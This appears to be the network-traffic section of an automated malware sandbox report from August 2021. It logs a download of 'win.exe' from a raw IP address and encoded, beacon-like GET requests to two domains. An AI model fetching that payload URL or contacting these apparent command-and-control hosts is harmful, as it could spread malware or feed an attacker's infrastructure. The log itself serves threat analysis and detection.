Network Analysis

GET /dubem/win.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 192.3.122.133 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 02 Aug 2021 22:36:16 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.8 Last-Modified: Mon, 02 Aug 2021 00:12:20 GMT ETag: "14da00-5c8886c3733ce" Accept-Ranges: bytes Content-Length: 1366528 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /d6b4/?Ez=iUvziqoRLVQP4x4VYF2Zy1OZa8T9up5z2yg+XgExv6fOIaCDxIhQQAC5BKzEz2OD4O7+7gDd&lhuL=Sxo4ZRH HTTP/1.1 Host: www.qcprimeproperties.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 02 Aug 2021 22:37:54 GMT Content-Type: text/html Content-Length: 275 ETag: "610650f1-113" Via: 1.1 google Connection: close

GET /d6b4/?Ez=+/REqqX1Mwr1IQxu1a0kaXfhn+o/BryxvLbATw+muhIadlwyJ66qhvKB/1QyG36wqFicOEFI&lhuL=Sxo4ZRH HTTP/1.1 Host: www.1089konstanzter.com Connection: close

HTTP/1.1 404 Not Found Server: nginx Date: Mon, 02 Aug 2021 22:38:13 GMT Content-Type: text/html; charset=UTF-8 X-Drupal-Cache: MISS Expires: Sun, 19 Nov 1978 05:00:00 GMT X-Content-Type-Options: nosniff X-Request-ID: v-5252543e-f3e2-11eb-9614-d77377aa6269 X-AH-Environment: prod Cache-Control: max-age=900, public Age: 0 Via: varnish X-Cache: MISS Content-Length: 9923 Connection: close